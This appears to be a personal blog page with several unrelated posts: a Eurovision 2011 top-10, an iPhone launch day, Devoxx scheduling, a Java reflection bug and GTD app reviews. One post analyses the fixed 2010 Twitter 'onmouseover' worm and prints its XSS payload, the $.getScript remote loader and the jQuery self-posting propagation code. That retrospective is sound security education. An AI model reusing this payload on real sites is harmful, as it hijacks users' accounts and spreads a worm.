My ESC 2011 Top 10

It’s been awhile since I last took the time to write a piece of text longer than 140 chars 😛 So let’s take the Eurovision Song Contest (ESC) 2011 as an occasion to update my blog.

Yah, I know, there’s some controversy around the contest, “European Neighbor Contest” etc, and honestly, I hadn’t even planned watching it this year. But what can I say, it got me again. I guess, being a musician myself, there’s no way around the biggest European music event anyway. So I watched (at least a major part of) it live and got myself the album afterwards.

After listening to it a couple of times, I gotta say there were a whole bunch of great songs in the contest this year. An accurate Top10 list is almost impossible to compile, but since Top10 lists are so popular on the internetz, I made an effort. So here’s my personal ESC 2011 Top10 (based solely on the songs themselves, not the live performances nor the YT-Videos):

  1. Coming Home / Sjonni’s Friends (Iceland) [YT]
  2. In Love For A While / Anna Rossinelli (Switzerland) [YT]
  3. New Tomorrow / A Friend In London (Denmark) [YT]
  4. The Secret Is Love / Nadine Beiler (Austria) [YT]
  5. Running Scared / Nikki & Ell (Azerbaijan) [YT]
  6. Never Alone / 3JS (The Netherlands) [YT]
  7. Change / Hotel FM (Romania) [YT]
  8. Que Me Quiten Lo Bailao  / Lucia Perez (Spain) [YT]
    [Strong contestant for the Summerhit-2011 Title btw!]
  9. One More Day / Eldrine (Georgia) [YT]
  10. Da Da Dam / Paradise Oskar (Finland) [YT]

 

Advertisements

The Twitter “mouseover” hack – here’s how! [Update]

This article is mainly about the worm, not about the spam, but the mechanisms are similar.

First off, it wasn’t me. No, seriously. I just investigated after the fact to find out how such a huge flaw could have been possible and to find out what errors _not_ to do in my next web project. You’ll need some basic html/javascript/common sense knowledge to follow me here but I’ll try to keep it simple 😉

Step1: The breach

Apparently, there is was (it’s fixed now) a bug in the twitter website when it came to transforming tweet text that looks like a link, to an actual link you can click on. This code has to identify text starting with “http://” like “http://twitter.com” and transform it to an actual link, which, in HTML, looks something like:

<a href="http://twitter.com">http://twitter.com</a&gt;

The bug was that twitter didn’t recognize the end of a link properly. By inserting @" at the end of a legit URL, an attacker was able to escape the href attribute and inject code into the HTML code the twitter engine made out of his URL. Once you’re able to inject code into a website, hell’s doors are open. To the browser, it looks like twitter put that code there. Boom!

So for example by putting the link:

http://foo.bar/@"alt="google.com"

in a tweet, an attacker woulld have made the twitter engine generate the following HTML:

<a href="http://foo.bar/@"alt="google.com"> ...

Which, in this harmless case, would have printed a link to foo.bar with a hover label of “google.com”.

Step 2: Loading evil code

However, to do evil things, an attacker would need more than 140 chars worth of code. Therefore, he needed to load additional evil code. Here’s how:

So the attacker was able to inject code inside an HTML link. The thing is that HTML allows an “onmouseover” attribute in a link element, which executes javascript code when the mouse is hovered over that link.

Looking at the twitter HTML source, anyone interested can learn that they use the JQuery javascript framework. This framework is loaded into the twitter page anyway, so the attacker was able to happily use this framwork’s functions. To his great pleasure, the framework has a function called $.getScript(url) which loads javascript code from the specified URL.

By using this function in combination with the onmouseover attribute, the attacker was able to load additional evil code from his own server. This code got immediately executed by the browser.

Step 3: Spreading the word

The key to success for any worm is spreading the word (a.k.a. sending itself to the max ppl it can).

Since the attacker has control over a user’s twitter site anyway, he can control his browser to put the same maliciously crafted link that started the whole story into the controlled user’s status update box and pushing the “tweet” button. This is amazingly simple in javascript using JQuery and knowing twitter’s HTML source:

$('#status').val("http://t.co/@"onmouseover="$.getScript(my_javascript_link)"/");
$('.status-update-form').submit();

That’s it.

Step 4: Do it with style

OK the basics are set up. Now let’s add some style. There are a couple of things the attacker can improve:

First of all, the user would still have to hover over the link for the hack to fire, since the attack relies on the execution of “onmouseover”. To maximize the chance the user hovers over the actual link, let’s just print the link in a HUGE font size, filling up all the browser so the attacker can be SURE the mouse will hover over it. Since we control the HTML displaying the link, we can just put the following in:

style="font-size:999999999999px;"

Done.

Next, the short URL. A tweet has 140 chars so the attacker needed a URL shortening service to point to his malicious javascript file. In this concrete case, he used is.gd. Actually, is.gd is really gd because they were reasonably fast at disabling the redirection, which helped stop spreading the worm. The attacker would’ve been better off registering its own controlled, short, domain… but who am I to give such tips 😛

Finally, some mockery. Instead of using any insignificant URL, the attacker used t.co, which is twitter’s own controversially discussed URL shortening service they introduced claiming it would enhance security for twitter users, really stylish, isn’t it? 😀

Hope you’ve enjoyed reading how it’s done, and avoid Cross-Site-Scripting ppl! 🙂

[Update: Twitter put out an official statement about the issue which is, of course, a lot less technical than my analysis 😉 : http://blog.twitter.com/2010/09/all-about-onmouseover-incident.html ]

iPhone 4 Day

So it’s that day again: An Apple iPhone launch day in Belgium! As you may or may not remember, I was first in line to get my iPhone 3G 2 yars ago. After letting the 3GS pass last year (on purpose ;-)), and with 2 years of raising Apple-awareness, would I be lucky enough to repeat the success??

I knew that getting an iPhone4 was going to be way hotter than getting the iPhone 3G back in the day. However, I didn’t want to camp there the day before. So here’s my journey.

Continue reading

Devoxx 09 Schedule Overview

If, like me, you’re attending the Devoxx ’09 conference next week and are preparing your personal schedule, you might need a consolidated overview over what’s happening where at any given time.

Although the sessions and talks are listed on the Devoxx 09 website, it lacks such a bird’s-eye view IMHO. I created an Excel sheet containing everything you need to plan your week so you don’t miss any talk you’re interested in.

The file can be downloaded here:

See ya @ Dexovv 09! 🙂

Trouble with Java invocations using reflection

The WTF

In a mocked UnitTest, I created a mock on a logger interface to control its invocations. However, in addition to that, I wanted to reach every invocation through to a _real_ log4j backend of that logger interface since those log messages could contain information needed to find errors…

The idea is to lookup the invoked methods on the _real_ logger using reflection, so I don’t have to adapt the testCase whenever I change the log interface, it is just passing through anyway, right? I left polymorphism out of the mix to simplify the code (I don’t use polymorphism in log interfaces anyway).

Compilation is absolutely fine but at rumtime I got:

java.lang.IllegalArgumentException: argument type mismatch

Can you spot the error?

public Object execute(String invokedMethod, List parameterValues) throws Exception {
    // Invoke the method on the real logger
    MyLogger realLogger = new MyLoggerLog4jBackend();
    Method[] methods = realLogger.getClass().getMethods();

    // Ignore polymorphism in method lookup for now...
    Method method = null;
    for (int i = 0; i < methods.length && method == null; i++) {
        if (methods[i].getName().equals(invokedMethod)) {
            method = methods[i];
        }
    }

    if (method != null) {
        method.invoke(realLogger, parameterValues);
    }
}

Oh yes, the parameter of the invocation at runtime is actually a java.lang.IllegalArgumentException and MyLogger looks something like:

public interface MyLogger {

    [.. other irrelevant methods...]

    void fatalError(Exception e);

}

The Solution

It’s the invocation in itself:

method.invoke(realLogger, parameterValues);

If you take a close look at the invoke method’s declaration, you’ll see it’s:

public Object invoke(Object obj, Object... args);

But since parameterValues is a java.util.List, it used that list as a parameter in itself instead of unwrapping it! And since java.util.List and java.lang.Exception are not type compatible, boom!

5 things 4 Things

incomplete_things_logoAs mentioned in my previous posts, I chose Cultured Code’s Things as my GTD tool. The Mac / iPhone combination makes it really versatile and after about a month of using it, I’m still loving it. Therer are, however, a bunch of improvements required for Things to become truly great. These are the 5 features I consider “must have”s. Everything else would just be “nice to have”s to me as of writing.

I proposed these features directly to Cultured Code. Since I want to share the ideas with you and maybe even get some reader feedback (a man can dream, can’t he?), here’s a copy of the eMails I sent to them (most important first). Continue reading

Finding the right GTD app

It’s been about three weeks since I decided to use Cultured Code’s “Things” solution to get my things done.

But before I eventually spent the money on Things, I took a deeper look at it, together with two other GTD apps: the Omni Group’s “OmniFocus” and Potionfactory’s “The Hit List”.

OmniFocusOmniFocus icon

While it is certainly the most precise implementation of Allen’s GTD Methodology, it didn’t “feel right” for me. Its look and feel are just not as simple and fun to use as Things’. However, OmniFocus also has a couple of advantages over Things.

  • Most importantly, the ability to embed files into the tool db
  • Location-based contexts are a killer feature on the iPhone client
  • The clipping (it’s kind of a luxurious copy & paste to create new tasks) flexibility and options are a little bit better than Things’
  • The View Bar and Perspective features. The customization and fine-tuning of almost any part of the GUI to get a precise “view” on the data and the ability to store and recall these so called “perspectives” anytime is a really powerful feature that stands out when compared to other task management applications
  • Especially compared to Things, having a granularity at minute level is way more flexible than a day granularity

The Hit ListThe Hit List icon

While The Hit List’s GUI looks very promising at first glance, it turned out to me that the application is missing some serious power. Note though that, as of writing, the current version is only the first public beta and that the lack of functionality might be addressed in future versions.

What really hit me was the effort they put into making the whole application navigable and controllable from the keyboard. There’s a key combination for virtually anything and it really seems like they’ve put a lot of effort into designing that. Shortcuts are often elegantly displayed next to GUI elements (yes, you can turn that off) in order to familiarize the user with the equivalent keyboard shortcut. It’s so omnipresent that it might even be a little bit too much, but hey, props to them for putting the effort in!

The most annoying thing about The Hit List to me were the tabs. They show them off very prominently on all screen shots so you’d expect it to be a killer feature, right? Well actually it isn’t: tabs are really just a duplication of the menu on the left, except that you can select which of the menu items get turned into tabs.

There were only 3 outstanding features in The Hit List:

  • The aforementioned keyboard controls
  • GUI animations are geniously designed! The GUI is really responsive and dynamic, but not too much, just the perfect amount of it.
  • Data selection is well designed. For example, filing a task into a project happens through a very responsive, intelligent and nice looking input box. Typing a few letters of any part of the project or tag is enough for the hit list to find what you’re looking for.

Things was the winner for me. But…Things icon

…although it was my first choice, I took the opportunity of gained experience and recent tool comparisons to point out 5 of the most important features / improvements yet missing within Things to become _my_ perfect GTD application. I will feature those in an upcoming blog post, so stay tuned!